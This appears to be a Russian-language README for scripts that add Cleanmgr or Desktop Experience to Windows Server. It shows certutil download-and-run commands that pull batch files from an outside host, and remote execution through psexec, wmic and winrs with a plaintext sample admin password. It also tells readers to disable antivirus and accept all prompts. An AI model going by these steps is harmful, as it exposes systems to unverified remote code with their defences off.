# SetDesktopExperience

Примечание. Желательно устанавливать продукты под учётной записью администратора компьютера/домена и приравненным к ним записям. Возможны баги на серверных операционных системах при нестандартных настройках их.

## Настройка программы Cleanmgr.exe и установка Desktop Experience

Данные скрипты устанавливают программу *Clean Master* в серверных версиях Microsoft Windows 6.1, 6.3 или весь пакет Desktop Experience. Это необходимо для оптимизации дискового пространства в серверных версиях Microsoft Windows.

## Ссыылки на загрузку скриптов: 

- <http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/download.php?file=cp_cleanmgr.site.bat>
- <http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/download.php?file=cp_cleanmgr.bat>
- <http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/download.php?file=Add_DesktopExperience.bat>
- <http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/download.php?file=SetDesktopExperience.md>

После загрузки скрипта запустите его в папке щелчком правой клавиши мыши на его имени, выбрать пункт «Запустить как администратор» и соглашайтесь со всеми сообщениями в диалоговых окнах. Скрипты требуют административных прав.

## Загрузка скриптов в командной строке

В данных примерах предполагается, что профиль пользователя на удалённом компьютере находится в папке: `C:\Users\Администратор`, логин Windows `Администратор`, и пароль `0A9s8d7F`. Если это не так, измените эти значения в строках ниже.

Запустите следующие команды на удалённом компьютере:

#### Команда 1:

```
certutil.exe -urlcache -f http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/cp_cleanmgr.site.bat C:\Users\Администратор\cp_cleanmgr.site.bat

certutil.exe -urlcache -f http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/cp_cleanmgr.bat C:\Users\Администратор\cp_cleanmgr.bat

certutil.exe -urlcache -f http://file.netip4.ru/PROGS/NIT/SetDesktopExperience/W2K8/Add_DesktopExperience.bat C:\Users\Администратор\Add_DesktopExperience.bat
```

(часто блокируется антивирусом, для  Windows 6.1)

#### Команда 2:

cmd.exe /c C:\Users\Администратор\cp_cleanmgr.bat, или

cmd.exe /c C:\Users\Администратор\cp_cleanmgr.site.bat, или

cmd.exe /c C:\Users\Администратор\Add_DesktopExperience.bat

## Запуск команд в реверс-шелл

ВНИМАНИЕ! Многие из этих программ определяются недобросовестными антивирусными вендорами как malware, хотя сами по себе они безопасны. Откажитесь от их использования, или запускайте программы при отключённой антивирусной защите на исходном и целевом компьютере.

Примечание. Как правило, данный раздел не применим к клиентским операционным системам Microsoft Windows, поскльку при их правильной настройке в них закрыты все входящие порты. Поэтому в этих системах администратору нужно сначала открыть порты и запустить службы (при помощи физического контакта), а уже потом пытаться получить к компьютерам удалённый доступ.

Для запуска этого скрипта удалённо при помощи команд в командной строке необходимо перед командой записать следующее:

### Запуск команд в smb оболочке (psexec.exe)

Запуск команды команда на целевом компьютере осуществляется с помощью следующей конструкции:

```
psexec.exe \\Computer /u Администратор /p 0A9s8d7F /i /h команда
```

где `Computer` — имя или IP адрес компьютера, `Администратор` — логин пользователя (см. выше), `0A9s8d7F` — его пароль. Ключи /i, /h исправляют ошибки запуска программы с повышенными привилегиями.

Примечание. Данный способ работает, если на удалённом компьютере открыт порт 445/tcp или 139/tcp и отключён антивирус. В противном случае работоспособность скрипта не гарантирована

### Запуск команд в WMI оболочке (wmic.exe)

Запуск команды команда на целевом компьютере осуществляется с помощью следующей конструкции:

```
wmic.exe /user:Администратор /password:0A9s8d7F /node:"Computer" process call create "команда"
```

где `Computer` — имя или IP адрес компьютера, `Администратор` — логин пользователя (см. выше), `0A9s8d7F` — его пароль. Указание кавычек обязательно.

Примечание. Конструкция с указание пользователя и пароля не работает на локальном компьютере. Если WMIC.exe надо запустить от имени другого пользователя, необходимо опустить ключи /USER, /PASSWORD и запустить кострукцию при помощи runas.

Примечание. Данная конструкция не выдаёт эхо-ответ консоли команды, выполнение идёт «вслепую». Однако выдаётся код завершения програмимы, по которому можно определить, если что-то пошло не так. По умолчанию, при успешном завершении возвращается код 0.

Примечание. Данный способ работает, если на удалённом компьютере открыты порты 445/tcp и 135/tcp. В противном случае работоспособность скрипта не гарантирована

### Запуск команд в WinRM оболочке (wimrs)

ВАЖНО! Для успешного выполнения конструкции на исходной машины должен быть настроен параметр TrustedHosts ко всем подключаемым компьютерам. Без этого вызов команды winrs завершится ошибкой. Как и для чего настраивать параметр TrustedHosts, смотри в описании WinRM.

Запуск команды команда на целевом компьютере осуществляется с помощью следующей конструкции:

```
winrs -r:Computer -u:Администратор -p:0A9s8d7F "команда"
```

где `Computer` — имя или IP адрес компьютера, `Администратор` — логин пользователя (см. выше), `0A9s8d7F` — его пароль. Указание кавычек обязательно.

Примечание. Данный способ работает, если на удалённом компьютере открыт порт 5985/tcp. В противном случае работоспособность скрипта не гарантирована

